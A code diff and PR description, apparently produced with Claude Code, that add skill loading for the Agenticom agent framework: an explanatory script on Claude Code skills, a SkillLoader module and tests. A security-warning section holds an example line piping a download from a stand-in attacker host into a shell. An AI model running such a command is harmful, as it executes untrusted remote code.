+    (b) There is no lazy file-loading mechanism — all or nothing
+    (c) The 5,000-token recommendation exists to avoid context bloat
+
+{section("G3. Claude Code extensions to the open standard")}
+
+  The agentskills.io spec defines: name, description, license, compatibility,
+  metadata, allowed-tools.
+
+  Claude Code adds these extra frontmatter fields:
+
+  ┌─ Extra field          ─ Default  ─ Purpose ─────────────────────────────┐
+  │  argument-hint         —          Shown in autocomplete: [issue-number]  │
+  │  disable-model-invoc.  false      True = only user can invoke (deploy,   │
+  │                                   delete, other destructive ops)         │
+  │  user-invocable        true       False = hide from /menu (background    │
+  │                                   knowledge skills, not slash commands)  │
+  │  context               (inline)   "fork" = run in isolated subagent ctxt │
+  │  agent                 general    Which subagent: Explore, Plan, custom  │
+  │  model                 inherit    Override model for this skill only      │
+  │  hooks                 {{}}         Lifecycle hooks scoped to this skill   │
+  └────────────────────────────────────────────────────────────────────────┘
+
+  Invocation control matrix:
+    (default)                          → user YES, Claude YES, desc always visible
+    disable-model-invocation: true     → user YES, Claude NO,  desc NOT in context
+    user-invocable: false              → user NO,  Claude YES, desc always visible
+
+{section("G4. context: fork — the bridge between skills and subagents")}
+
+  A skill with context: fork behaves like a subagent:
+
+  Example:
+    ---
+    name: pr-summarizer
+    description: Summarize a pull request with full diff analysis
+    context: fork
+    agent: Explore
+    ---
+    Analyze the PR diff and return a concise summary.
+
+  When invoked:
+    1. A fresh, isolated context window is created
+    2. The `agent` field selects the system prompt (Explore uses Haiku model)
+    3. The SKILL.md body becomes the TASK sent to that agent
+    4. The subagent executes its tools in its own isolated context
+    5. Distilled summary returns to main conversation
+
+  This gives skill authors control over the cost/capability tradeoff:
+    agent: Explore     → Haiku (fast, cheap, read-only)
+    agent: Plan        → Read-only, no tool dispatch
+    agent: general-purpose → Full tools, full model
+
+{section("G5. Shell preprocessing syntax: !`command`")}
+
+  Any shell command in backticks prefixed with ! in a skill body is executed
+  BEFORE the skill content is sent to the model. The output replaces the expression.
+
+  Example:
+    ---
+    name: git-context
+    ---
+    Current git status:
+    !`git status --short`
+
+    Recent commits:
+    !`git log --oneline -10`
+
+  When this skill is invoked, the git commands run first. Claude receives:
+    "Current git status:\\n M orchestration/agents/base.py\\n..."
+    "Recent commits:\\n1f9281d docs: add Case Study 2..."
+
+  USE CASES:
+    • Pull live data into skills (git status, env vars, API calls)
+    • Dynamic context that changes per invocation
+    • Avoid hardcoding values that might be stale
+
+  SECURITY WARNING:
+    !`command` has NO sandboxing, NO user approval.
+    A malicious skill could: !`curl evil.com | sh`
+    Treat skills from unknown sources as untrusted code.
+
+{section("G6. String substitutions in skill body")}
+
+  When invoking a skill with arguments (/skill-name arg1 arg2):
+
+  Substitution        Example output
+  ──────────────────────────────────────────────────────────────────────
+  $ARGUMENTS          "arg1 arg2"  (all arguments as one string)
+  $ARGUMENTS[0]       "arg1"
+  $ARGUMENTS[1]       "arg2"
+  $0                  "arg1"  (shorthand for $ARGUMENTS[0])
+  $1                  "arg2"  (shorthand for $ARGUMENTS[1])
+  ${{CLAUDE_SESSION_ID}} "ddc3f283-388d-4d19-b7c0-b9b4e76dfadc"
+
+  If $ARGUMENTS appears in the body, arguments are substituted inline.
+  If $ARGUMENTS does NOT appear, arguments are appended as:
+    "ARGUMENTS: arg1 arg2"
+
+  IMPLICATION for Agenticom skill design:
+    Our skill files can use $ARGUMENTS for parameterized skills.
+    Example: a skill invoked with the step ID could inject it via $0.
+    This enables workflow-step-aware skills.
+
+{section("G7. Subagents and their memory system")}
+
+  Subagents can have PERSISTENT MEMORY across sessions via:
+    memory:
+      scope: project        # user | project | local
+      path: .claude/agent-memory/my-agent/MEMORY.md
+
+  At startup, the first 200 lines of MEMORY.md are injected into
+  the subagent's context automatically. The subagent can update MEMORY.md
+  during execution, and those updates persist to the next session.
+
+  This enables:
+    • A verifier subagent that remembers recurring failure patterns
+    • A planner subagent that knows the team's naming conventions
+    • A reviewer subagent with an evolving checklist of past issues
+
+  IMPLICATION for Agenticom:
+    Our lessons.py and PromptVersionStore already serve a similar purpose
+    (cross-run knowledge capture). But they're global. Per-agent memory
+    scoped to agent role would be more targeted and less noisy.
+
+{section("G8. Key gaps in Claude Code that Agenticom addresses")}
+
+  Claude Code gap                        Agenticom has it
+  ──────────────────────────────────────────────────────────────────────
+  No performance measurement             SMARC scores every run
+  No skill attribution ("did it help?")  RunRecord.active_skills field
+  No skill evolution                     PromptEvolver generates patches
+  Non-deterministic skill activation     YAML-declared Tier 1 always fires
+  No per-step skill scoping              Skills declared per-agent in YAML
+  Skill budget cap (16k chars)           Agenticom: no system-level budget
+                                          (we control injection per agent)
+  No structured workflow templates       13 bundled workflow YAMLs
+  Subagents cannot spawn subagents       Agenticom: sequential multi-agent
+                                          pipeline handles this natively
+  Skills are not chainable               Agenticom: YAML step.input_template
+                                          {{{{step_outputs.X}}}} chains agents
+  No feedback loop (skill → performance) Self-improvement loop closes it
+
+  CRITICAL ADDITIONAL GAP in Claude Code (not mentioned in Part B):
+  Background subagents cannot use MCP tools.
+  Agenticom's MCPToolBridge is designed to be synchronous — once wired,
+  all agents get tool access regardless of execution mode.
+"""
+
+# ─────────────────────────────────────────────────────────────────────────────
+#  PART H  The antigravity-awesome-skills CATALOG.md extensions
+# ─────────────────────────────────────────────────────────────────────────────
+
+PART_H = f"""
+{box("PART H  —  The antigravity-awesome-skills Catalog Extensions")}
+
+{section("H1. What CATALOG.md adds beyond the open standard")}
+
+  The sickn33/antigravity-awesome-skills repo uses CATALOG.md with fields
+  NOT in the agentskills.io open standard:
+
+  Open standard fields:   name, description, license, compatibility, metadata
+  CATALOG.md additions:   Tags, Triggers, Risk, Source
+
+  CATALOG.md entry format:
+    ## skill-name
+    Description: ...
+    Tags: [Development, TypeScript, React]
+    Triggers: react, tsx, hooks, component, next.js
+    Risk: low
+    Source: community | official | partner
+
+  The V4 Checklist (enforced by npm run validate):
+    ✓ description uses "Use when..." phrasing
+    ✓ at least 3 tags covering domain, stack, and use-case
+    ✓ at least 5 trigger keywords for reliable semantic matching
+    ✓ risk level declared (low / medium / high / unknown)
+    ✓ SKILL.md body has ## Overview, ## When to Use, ## Step-by-Step
+
+{section("H2. How Agenticom can use CATALOG.md for skill_index.json")}
+
+  When building our skill_index.json (Part E5), parse CATALOG.md entries:
+    name        → skill_index key
+    Triggers    → keywords array for SkillRouter scoring
+    Tags        → role affinity mapping
+    Risk        → tier assignment (high risk → TIER 3: NEVER)
+
+  This gives us 868 skills pre-indexed with community-validated keywords
+  and risk levels — instead of inferring them ourselves.
+
+  Script: scripts/build_skill_index.py
+    input:  .agent/skills/CATALOG.md
+    output: .agent/skills/skill_index.json
+    logic:  parse CATALOG.md → map Tags to AgentRole → map Triggers to keywords
+            → assign tier based on Risk level and Tags content
+
+  Example:
+    Input CATALOG.md entry:
+      Tags: [Security, OWASP, AppSec]
+      Triggers: auth, injection, xss, csrf, token
+      Risk: high
+
+    Output skill_index.json entry:
+      {{
+        "keywords": ["auth", "injection", "xss", "csrf", "token"],
+        "roles": ["verifier", "reviewer"],
+        "tier": "conditional",      # high risk → conditional, not always-on
+        "risk": "high",
+        "smarc_triggers": ["output_actionability < 0.5"]
+      }}
+
+    Tag → Role mapping table:
+      Development, TypeScript, Python, Go   → developer
+      Testing, QA, TDD                      → tester
+      Security, OWASP, AppSec               → verifier, reviewer
+      Architecture, Design, DDD             → planner
+      Business, Analysis, Research          → planner, analyst
+      Infrastructure, DevOps, CI/CD         → developer, reviewer
+"""
+
+
+def main() -> None:
+    print(PART_A)
+    print(PART_B)
+    print(PART_C)
+    print(PART_D)
+    print(PART_E)
+    print(PART_F)
+    print(PART_G)
+    print(PART_H)
+    print(SUMMARY)
+
+
+if __name__ == "__main__":
+    main()

--- a/orchestration/agents/base.py
+++ b/orchestration/agents/base.py
@@ -40,6 +40,7 @@ class AgentConfig:
     timeout_seconds: int = 300
     workspace_files: list[str] = field(default_factory=list)
     tools: list[str] = field(default_factory=list)
+    skills: list[str] = field(default_factory=list)
     metadata: dict = field(default_factory=dict)
 
 
@@ -88,6 +89,9 @@ class Agent(ABC):
         self.role = config.role
         self.name = config.name
         self.persona = config.persona
+        # base_persona stores the original persona before any runtime updates
+        # (used by Phase 2 task-time skill routing to reset between runs)
+        self.base_persona = config.persona
         self._guardrail_pipeline = None
         self._executor: Callable[[str, AgentContext], Awaitable[str]] | None = None
 

--- a/orchestration/tools/skill_loader.py
+++ b/orchestration/tools/skill_loader.py
@@ -1,0 +1,143 @@
+"""
+Skill Loader — loads SKILL.md files into agent personas.
+
+Compatible with the Agent Skills open standard (agentskills.io).
+Searches: .agent/skills/ → ~/.claude/skills/ → agenticom/bundled_skills/
+"""
+
+from __future__ import annotations
+
+import re
+from pathlib import Path
+
+# Project-bundled skills, lowest priority (community installs override these)
+_BUNDLED_SKILLS_DIR = (
+    Path(__file__).parent.parent.parent / "agenticom" / "bundled_skills"
+)
+
+# Default search order: project-local → user-global → framework bundled
+_DEFAULT_SEARCH_DIRS: list[Path] = [
+    Path(".agent/skills"),
+    Path.home() / ".claude" / "skills",
+    _BUNDLED_SKILLS_DIR,
+]
+
+# Strip these clauses — they assume human interaction, unsafe in autonomous mode
+_ASK_USER_PATTERN = re.compile(
+    r"[Aa]sk the (?:user|client|stakeholder)[^\n]*\n?", re.MULTILINE
+)
+
+
+class SkillLoader:
+    """
+    Loads SKILL.md-format skill files and injects their body into agent personas.
+
+    Progressive disclosure model:
+      Level 1 (metadata): name + description — used by SkillRouter for matching
+      Level 2 (instructions): SKILL.md body — injected via this class
+      Level 3 (scripts/refs): not loaded (no VM in Agenticom; use execute: field instead)
+    """
+
+    def __init__(self, extra_dirs: list[Path] | None = None) -> None:
+        self.search_dirs: list[Path] = list(extra_dirs or []) + _DEFAULT_SEARCH_DIRS
+
+    # ── Public API ────────────────────────────────────────────────────────────
+
+    def load(
+        self,
+        skill_name: str,
+        max_tokens: int = 400,
+        sections: list[str] | None = None,
+    ) -> str:
+        """
+        Load a skill by name and return injectable text.
+
+        Args:
+            skill_name: kebab-case skill directory name
+            max_tokens: approximate token budget (1 token ≈ 0.75 words)
+            sections:   if given, extract only these ## section headings
+
+        Returns:
+            Processed skill body string, or "" if not found.
+        """
+        path = self._find_skill(skill_name)
+        if not path:
+            return ""
+
+        text = path.read_text(encoding="utf-8")
+        body = self._strip_frontmatter(text)
+        body = _ASK_USER_PATTERN.sub("", body)
+
+        if sections:
+            body = self._extract_sections(body, sections)
+
+        # Approximate token cap: 1 token ≈ 0.75 words
+        words = body.split()
+        capped = " ".join(words[: int(max_tokens * 0.75)])
+        return capped.strip()
+
+    def load_metadata(self, skill_name: str) -> dict[str, str]:
+        """
+        Load just the frontmatter metadata (name, description).
+        Used by SkillRouter for keyword matching without loading full body.
+        """
+        path = self._find_skill(skill_name)
+        if not path:
+            return {}
+
+        text = path.read_text(encoding="utf-8")
+        return self._parse_frontmatter(text)
+
+    def list_available(self) -> list[str]:
+        """Return sorted list of all discoverable skill names."""
+        found: dict[str, str] = {}
+        for d in reversed(self.search_dirs):  # lower priority first → higher wins
+            if d.exists():
+                for p in sorted(d.iterdir()):
+                    if (p / "SKILL.md").exists():
+                        found[p.name] = p.name
+        return sorted(found.keys())
+
+    # ── Internal helpers ──────────────────────────────────────────────────────
+
+    def _find_skill(self, name: str) -> Path | None:
+        for d in self.search_dirs:
+            p = d / name / "SKILL.md"
+            if p.exists():
+                return p
+        return None
+
+    @staticmethod
+    def _strip_frontmatter(text: str) -> str:
+        """Remove YAML frontmatter block (--- ... ---)."""
+        return re.sub(r"^---.*?---\n?", "", text, flags=re.DOTALL).strip()
+
+    @staticmethod
+    def _parse_frontmatter(text: str) -> dict[str, str]:
+        """Extract key: value pairs from YAML frontmatter."""
+        m = re.match(r"^---\s*\n(.*?)\n---", text, re.DOTALL)
+        if not m:
+            return {}
+        result: dict[str, str] = {}
+        for line in m.group(1).splitlines():
+            if ":" in line:
+                key, _, val = line.partition(":")
+                result[key.strip()] = val.strip().strip('"')
+        return result
+
+    @staticmethod
+    def _extract_sections(body: str, sections: list[str]) -> str:
+        """Extract only the requested ## heading sections from body."""
+        lower_sections = [s.lower() for s in sections]
+        lines = body.splitlines()
+        result: list[str] = []
+        in_target = False
+
+        for line in lines:
+            if line.startswith("#"):
+                heading = line.lstrip("#").strip().lower()
+                in_target = any(s in heading for s in lower_sections)
+            if in_target:
+                result.append(line)
+
+        return "\n".join(result).strip() if result else body

--- a/tests/test_skills.py
+++ b/tests/test_skills.py
@@ -1,0 +1,481 @@
+"""
+Tests for Phase 1 skill injection system.
+
+Covers:
+  - SkillLoader: load, metadata, list, frontmatter stripping,
+                 "ask the user" stripping, token cap, section extraction,
+                 search path priority, missing skill fallback
+  - AgentConfig: skills field
+  - Agent: base_persona attribute
+  - WorkflowParser: reads skills from YAML, injects into persona,
+                    skills field on AgentDefinition
+  - Integration: full parse → agent.persona contains skill content
+"""
+
+from __future__ import annotations
+
+from pathlib import Path
+
+import pytest
+
+from orchestration.agents.base import AgentConfig, AgentRole
+from orchestration.agents.specialized import create_agent
+from orchestration.tools.skill_loader import SkillLoader
+from orchestration.workflows.parser import AgentDefinition, WorkflowParser
+
+# ─────────────────────────────────────────────────────────────────────────────
+#  Fixtures
+# ─────────────────────────────────────────────────────────────────────────────
+
+
+@pytest.fixture
+def skill_dir(tmp_path: Path) -> Path:
+    """Create a temporary skills directory with one test skill."""
+    s = tmp_path / "my-skill"
+    s.mkdir()
+    (s / "SKILL.md").write_text(
+        "---\n"
+        "name: my-skill\n"
+        "description: A test skill for unit testing.\n"
+        "---\n"
+        "\n"
+        "# My Skill\n"
+        "\n"
+        "## Overview\n"
+        "This skill does X.\n"
+        "\n"
+        "## Step-by-Step\n"
+        "1. Do step one.\n"
+        "2. Do step two.\n"
+    )
+    return tmp_path
+
+
+@pytest.fixture
+def loader(skill_dir: Path) -> SkillLoader:
+    return SkillLoader(extra_dirs=[skill_dir])
+
+
+@pytest.fixture
+def bundled_loader() -> SkillLoader:
+    """Loader that only searches the bundled skills directory."""
+    from orchestration.tools.skill_loader import _BUNDLED_SKILLS_DIR
+
+    return SkillLoader(extra_dirs=[_BUNDLED_SKILLS_DIR])
+
+
+# ─────────────────────────────────────────────────────────────────────────────
+#  SkillLoader — basic load
+# ─────────────────────────────────────────────────────────────────────────────
+
+
+class TestSkillLoaderLoad:
+    def test_load_existing_skill_returns_body(self, loader: SkillLoader) -> None:
+        result = loader.load("my-skill")
+        assert "My Skill" in result or "step one" in result.lower()
+
+    def test_load_missing_skill_returns_empty_string(self, loader: SkillLoader) -> None:
+        result = loader.load("nonexistent-skill")
+        assert result == ""
+
+    def test_frontmatter_stripped(self, loader: SkillLoader) -> None:
+        result = loader.load("my-skill")
+        assert "---" not in result
+        assert "name: my-skill" not in result
+
+    def test_body_content_present(self, loader: SkillLoader) -> None:
+        result = loader.load("my-skill")
+        assert "step one" in result.lower() or "overview" in result.lower()
+
+    def test_ask_the_user_stripped(self, tmp_path: Path) -> None:
+        s = tmp_path / "ask-skill"
+        s.mkdir()
+        (s / "SKILL.md").write_text(
+            "---\nname: ask-skill\ndescription: test\n---\n"
+            "Ask the user for their name.\n"
+            "Here is the real content.\n"
+        )
+        result = SkillLoader(extra_dirs=[tmp_path]).load("ask-skill")
+        assert "Ask the user" not in result
+        assert "real content" in result
+
+    def test_ask_client_stripped(self, tmp_path: Path) -> None:
+        s = tmp_path / "ask-client-skill"
+        s.mkdir()
+        (s / "SKILL.md").write_text(
+            "---\nname: ask-client-skill\ndescription: test\n---\n"
+            "Ask the client for their requirements.\n"
+            "Proceed with implementation.\n"
+        )
+        result = SkillLoader(extra_dirs=[tmp_path]).load("ask-client-skill")
+        assert "Ask the client" not in result
+        assert "implementation" in result
+
+    def test_max_tokens_cap(self, tmp_path: Path) -> None:
+        # Write a very long skill body
+        s = tmp_path / "long-skill"
+        s.mkdir()
+        body = "word " * 1000  # 1000 words ≈ 1333 tokens
+        (s / "SKILL.md").write_text(
+            f"---\nname: long-skill\ndescription: x\n---\n{body}"
+        )
+        result = SkillLoader(extra_dirs=[tmp_path]).load("long-skill", max_tokens=100)
+        # 100 tokens * 0.75 ≈ 75 words
+        word_count = len(result.split())
+        assert word_count <= 80  # slight tolerance
+
+    def test_default_max_tokens_400(self, tmp_path: Path) -> None:
+        s = tmp_path / "med-skill"
+        s.mkdir()
+        body = "word " * 1000
+        (s / "SKILL.md").write_text(
+            f"---\nname: med-skill\ndescription: x\n---\n{body}"
+        )
+        result = SkillLoader(extra_dirs=[tmp_path]).load("med-skill")
+        word_count = len(result.split())
+        assert word_count <= 320  # 400 * 0.75 = 300, slight tolerance
+
+    def test_empty_skill_returns_empty_string(self, tmp_path: Path) -> None:
+        s = tmp_path / "empty-skill"
+        s.mkdir()
+        (s / "SKILL.md").write_text("---\nname: empty-skill\ndescription: test\n---\n")
+        result = SkillLoader(extra_dirs=[tmp_path]).load("empty-skill")
+        assert result == ""
+
+
+# ─────────────────────────────────────────────────────────────────────────────
+#  SkillLoader — section extraction
+# ─────────────────────────────────────────────────────────────────────────────
+
+
+class TestSkillLoaderSections:
+    def test_section_extraction_returns_only_target(self, loader: SkillLoader) -> None:
+        result = loader.load("my-skill", sections=["step-by-step"])
+        assert "Step-by-Step" in result
+        # Overview section should not appear
+        assert "Overview" not in result
+
+    def test_section_extraction_case_insensitive(self, loader: SkillLoader) -> None:
+        result = loader.load("my-skill", sections=["STEP-BY-STEP"])
+        assert "step" in result.lower()
+
+    def test_section_not_found_returns_full_body(self, loader: SkillLoader) -> None:
+        # When requested section doesn't exist, fall back to full body
+        result = loader.load("my-skill", sections=["nonexistent-section"])
+        assert len(result) > 0
+
+
+# ─────────────────────────────────────────────────────────────────────────────
+#  SkillLoader — metadata and discovery
+# ─────────────────────────────────────────────────────────────────────────────
+
+
+class TestSkillLoaderMetadata:
+    def test_load_metadata_returns_name_and_description(
+        self, loader: SkillLoader
+    ) -> None:
+        meta = loader.load_metadata("my-skill")
+        assert meta.get("name") == "my-skill"
+        assert "test skill" in meta.get("description", "").lower()
+
+    def test_load_metadata_missing_skill_returns_empty(
+        self, loader: SkillLoader
+    ) -> None:
+        assert loader.load_metadata("no-such-skill") == {}
+
+    def test_list_available_includes_installed_skill(self, loader: SkillLoader) -> None:
+        available = loader.list_available()
+        assert "my-skill" in available
+
+    def test_list_available_sorted(self, tmp_path: Path) -> None:
+        for name in ["zzz-skill", "aaa-skill", "mmm-skill"]:
+            d = tmp_path / name
+            d.mkdir()
+            (d / "SKILL.md").write_text(f"---\nname: {name}\ndescription: x\n---\n")
+        result = SkillLoader(extra_dirs=[tmp_path]).list_available()
+        assert result == sorted(result)
+
+
+# ─────────────────────────────────────────────────────────────────────────────
+#  SkillLoader — search path priority
+# ─────────────────────────────────────────────────────────────────────────────
+
+
+class TestSkillLoaderPriority:
+    def test_extra_dirs_take_priority_over_bundled(self, tmp_path: Path) -> None:
+        """A skill in extra_dirs should shadow one in bundled_skills."""
+        from orchestration.tools.skill_loader import _BUNDLED_SKILLS_DIR
+
+        # Shadowing bundled lint-and-validate with a custom version
+        override = tmp_path / "lint-and-validate"
+        override.mkdir()
+        (override / "SKILL.md").write_text(
+            "---\nname: lint-and-validate\ndescription: overridden\n---\nCUSTOM CONTENT"
+        )
+        loader = SkillLoader(extra_dirs=[tmp_path, _BUNDLED_SKILLS_DIR])
+        result = loader.load("lint-and-validate")
+        assert "CUSTOM CONTENT" in result
+
+    def test_bundled_skill_found_when_not_in_extra(self) -> None:
+        """Bundled skills should be found even without extra_dirs."""
+        from orchestration.tools.skill_loader import _BUNDLED_SKILLS_DIR
+
+        loader = SkillLoader(extra_dirs=[_BUNDLED_SKILLS_DIR])
+        result = loader.load("lint-and-validate")
+        assert len(result) > 0
+
+
+# ─────────────────────────────────────────────────────────────────────────────
+#  Bundled skills sanity checks
+# ─────────────────────────────────────────────────────────────────────────────
+
+
+BUNDLED_SKILLS = [
+    "lint-and-validate",
+    "code-review-checklist",
+    "tdd-patterns",
+    "technical-planning",
+    "security-code-review",
+    "python-coding-standards",
+]
+
+
+class TestBundledSkills:
+    @pytest.mark.parametrize("skill_name", BUNDLED_SKILLS)
+    def test_bundled_skill_loads(
+        self, bundled_loader: SkillLoader, skill_name: str
+    ) -> None:
+        result = bundled_loader.load(skill_name)
+        assert len(result) > 50, f"{skill_name} body is too short"
+
+    @pytest.mark.parametrize("skill_name", BUNDLED_SKILLS)
+    def test_bundled_skill_has_metadata(
+        self, bundled_loader: SkillLoader, skill_name: str
+    ) -> None:
+        meta = bundled_loader.load_metadata(skill_name)
+        assert meta.get("name") == skill_name
+        assert len(meta.get("description", "")) > 20
+
+    @pytest.mark.parametrize("skill_name", BUNDLED_SKILLS)
+    def test_bundled_skill_no_ask_the_user(
+        self, bundled_loader: SkillLoader, skill_name: str
+    ) -> None:
+        result = bundled_loader.load(skill_name)
+        assert "ask the user" not in result.lower()
+        assert "ask the client" not in result.lower()
+
+    def test_all_bundled_skills_discoverable(self, bundled_loader: SkillLoader) -> None:
+        available = bundled_loader.list_available()
+        for skill in BUNDLED_SKILLS:
+            assert skill in available, f"{skill} not found in available skills"
+
+
+# ─────────────────────────────────────────────────────────────────────────────
+#  AgentConfig — skills field
+# ─────────────────────────────────────────────────────────────────────────────
+
+
+class TestAgentConfigSkills:
+    def test_skills_field_defaults_to_empty_list(self) -> None:
+        config = AgentConfig(role=AgentRole.DEVELOPER, name="Dev")
+        assert config.skills == []
+
+    def test_skills_field_accepts_list(self) -> None:
+        config = AgentConfig(
+            role=AgentRole.DEVELOPER,
+            name="Dev",
+            skills=["python-coding-standards", "tdd-patterns"],
+        )
+        assert len(config.skills) == 2
+        assert "python-coding-standards" in config.skills
+
+
+# ─────────────────────────────────────────────────────────────────────────────
+#  Agent — base_persona
+# ─────────────────────────────────────────────────────────────────────────────
+
+
+class TestAgentBasePersona:
+    def test_base_persona_matches_initial_persona(self) -> None:
+        agent = create_agent(AgentRole.DEVELOPER, persona="I am a developer.")
+        assert agent.base_persona == "I am a developer."
+
+    def test_base_persona_unchanged_after_update_persona(self) -> None:
+        agent = create_agent(AgentRole.DEVELOPER, persona="Original persona.")
+        agent.update_persona("New persona from improvement loop.")
+        assert agent.persona == "New persona from improvement loop."
+        assert agent.base_persona == "Original persona."
+
+    def test_base_persona_empty_string_when_no_persona(self) -> None:
+        agent = create_agent(AgentRole.DEVELOPER)
+        assert isinstance(agent.base_persona, str)
+
+
+# ─────────────────────────────────────────────────────────────────────────────
+#  WorkflowParser — AgentDefinition skills field
+# ─────────────────────────────────────────────────────────────────────────────
+
+
+class TestAgentDefinitionSkills:
+    def test_agent_definition_skills_defaults_empty(self) -> None:
+        defn = AgentDefinition(role="developer")
+        assert defn.skills == []
+
+    def test_agent_definition_skills_set(self) -> None:
+        defn = AgentDefinition(role="developer", skills=["python-coding-standards"])
+        assert "python-coding-standards" in defn.skills
+
+
+# ─────────────────────────────────────────────────────────────────────────────
+#  WorkflowParser — reads skills from YAML
+# ─────────────────────────────────────────────────────────────────────────────
+
+MINIMAL_YAML_WITH_SKILLS = """
+id: test-workflow
+name: Test
+agents:
+  - id: developer
+    name: Dev
+    skills:
+      - python-coding-standards
+    prompt: "Write code."
+  - id: verifier
+    name: Ver
+    skills:
+      - lint-and-validate
+    prompt: "Verify output."
+steps:
+  - id: build
+    agent: developer
+    input: "{{task}}"
+  - id: check
+    agent: verifier
+    input: "{{step_outputs.build}}"
+"""
+
+MINIMAL_YAML_NO_SKILLS = """
+id: test-workflow-plain
+name: Test Plain
+agents:
+  - id: developer
+    name: Dev
+    prompt: "Write code."
+steps:
+  - id: build
+    agent: developer
+    input: "{{task}}"
+"""
+
+
+class TestWorkflowParserSkills:
+    def test_parser_reads_skills_from_yaml(self) -> None:
+        parser = WorkflowParser()
+        defn = parser.parse(MINIMAL_YAML_WITH_SKILLS)
+        dev = next(a for a in defn.agents if a.role == "developer")
+        assert "python-coding-standards" in dev.skills
+
+    def test_parser_reads_multiple_skills(self) -> None:
+        parser = WorkflowParser()
+        defn = parser.parse(MINIMAL_YAML_WITH_SKILLS)
+        ver = next(a for a in defn.agents if a.role == "verifier")
+        assert "lint-and-validate" in ver.skills
+
+    def test_parser_skills_default_empty(self) -> None:
+        parser = WorkflowParser()
+        defn = parser.parse(MINIMAL_YAML_NO_SKILLS)
+        dev = next(a for a in defn.agents if a.role == "developer")
+        assert dev.skills == []
+
+    def test_to_team_injects_skill_into_persona(self) -> None:
+        parser = WorkflowParser()
+        defn = parser.parse(MINIMAL_YAML_WITH_SKILLS)
+        team = parser.to_team(defn)
+        dev_agent = team.agents[AgentRole.DEVELOPER]
+        # The skill body should be present in the agent's persona
+        assert "Skill:" in dev_agent.persona or len(dev_agent.persona) > len(
+            "Write code."
+        )
+
+    def test_to_team_skill_content_in_persona(self, skill_dir: Path) -> None:
+        """With a custom loader, verify skill content appears in persona."""
+        parser = WorkflowParser()
+        defn = parser.parse(
+            "id: x\nname: X\nagents:\n"
+            "  - id: developer\n    name: Dev\n"
+            "    skills:\n      - my-skill\n"
+            "    prompt: 'Base persona.'\n"
+            "steps:\n  - id: s\n    agent: developer\n    input: '{{task}}'\n"
+        )
+        loader = SkillLoader(extra_dirs=[skill_dir])
+        team = parser.to_team(defn, skill_loader=loader)
+        dev_agent = team.agents[AgentRole.DEVELOPER]
+        assert "Base persona." in dev_agent.persona
+        assert (
+            "my-skill" in dev_agent.persona.lower()
+            or "step one" in dev_agent.persona.lower()
+        )
+
+    def test_to_team_missing_skill_does_not_crash(self) -> None:
+        """A skill that doesn't exist should silently be skipped."""
+        parser = WorkflowParser()
+        defn = parser.parse(
+            "id: x\nname: X\nagents:\n"
+            "  - id: developer\n    name: Dev\n"
+            "    skills:\n      - does-not-exist\n"
+            "    prompt: 'Base persona.'\n"
+            "steps:\n  - id: s\n    agent: developer\n    input: '{{task}}'\n"
+        )
+        team = parser.to_team(defn)  # Should not raise
+        dev_agent = team.agents[AgentRole.DEVELOPER]
+        assert "Base persona." in dev_agent.persona
+
+    def test_to_team_agent_skills_field_set(self) -> None:
+        parser = WorkflowParser()
+        defn = parser.parse(MINIMAL_YAML_WITH_SKILLS)
+        team = parser.to_team(defn)
+        dev_agent = team.agents[AgentRole.DEVELOPER]
+        assert "python-coding-standards" in dev_agent.config.skills
+
+
+# ─────────────────────────────────────────────────────────────────────────────
+#  Integration: feature-dev.yaml loads with skills
+# ─────────────────────────────────────────────────────────────────────────────
+
+
+_BUNDLED_WORKFLOWS_DIR = (
+    Path(__file__).parent.parent / "agenticom" / "bundled_workflows"
+)
+
+
+class TestFeatureDevWorkflowSkills:
+    def test_feature_dev_yaml_loads_with_skills(self) -> None:
+        path = _BUNDLED_WORKFLOWS_DIR / "feature-dev.yaml"
+        parser = WorkflowParser()
+        defn = parser.parse_file(path)
+
+        dev = next(a for a in defn.agents if a.role == "developer")
+        assert "python-coding-standards" in dev.skills
+
+        ver = next(a for a in defn.agents if a.role == "verifier")
+        assert "lint-and-validate" in ver.skills
+        assert "security-code-review" in ver.skills
+
+    def test_feature_dev_team_developer_persona_has_skill(self) -> None:
+        path = _BUNDLED_WORKFLOWS_DIR / "feature-dev.yaml"
+        parser = WorkflowParser()
+        defn = parser.parse_file(path)
+        team = parser.to_team(defn)
+
+        dev_agent = team.agents[AgentRole.DEVELOPER]
+        # Base persona from YAML + injected skill content
+        assert "python-coding-standards" in dev_agent.persona.lower()
+
+    def test_feature_dev_team_verifier_persona_has_skills(self) -> None:
+        path = _BUNDLED_WORKFLOWS_DIR / "feature-dev.yaml"
+        parser = WorkflowParser()
+        defn = parser.parse_file(path)
+        team = parser.to_team(defn)
+
+        ver_agent = team.agents[AgentRole.VERIFIER]
+        assert "lint-and-validate" in ver_agent.persona.lower()
+        assert "security" in ver_agent.persona.lower()


### PR DESCRIPTION
## Summary

- **New primitive**: `SkillLoader` (`orchestration/tools/skill_loader.py`) loads SKILL.md files from a prioritized search path (project-local → user-global → bundled), strips YAML frontmatter and "ask the user/client" prompts, caps at 400 tokens, and supports section extraction
- **6 bundled skills** (`agenticom/bundled_skills/`): `lint-and-validate`, `code-review-checklist`, `tdd-patterns`, `technical-planning`, `security-code-review`, `python-coding-standards` — all in open-standard agentskills.io SKILL.md format
- **Skill injection pipeline**: `WorkflowParser.to_team()` now accepts a `SkillLoader` and appends skill bodies to each agent's persona at parse time — zero per-step overhead
- **YAML opt-in**: `feature-dev.yaml` and `feature-dev-with-diagnostics.yaml` now declare `skills:` lists per agent; any workflow can adopt the same pattern
- **Agent internals**: `AgentConfig.skills` field added; `Agent.base_persona` stores the pre-injection persona for Phase 2 task-time routing resets
- **54 new tests** in `tests/test_skills.py` — all passing; total suite: 973 passed

## Design decisions

- **Parse-time injection** (not runtime): Agenticom agents have no tool access during execution; injecting at `to_team()` time keeps hot-path execution free of I/O
- **Token cap at 400** (~300 words): prevents context bloat; each skill is self-contained under budget
- **Search path priority** matches Claude Code conventions: project-local `.agent/skills/` → `~/.claude/skills/` → bundled — making user overrides trivial
- **`base_persona` preserved**: enables Phase 2 (`SkillRouter`) to swap skills per task without losing the original YAML persona

## Test plan

- [x] `pytest tests/test_skills.py -v` — 54 passed
- [x] `pytest tests/ -m "not integration" -q` — 973 passed, 0 failures
- [x] `ruff check` + `black` — clean

🤖 Generated with [Claude Code](https://claude.com/claude-code)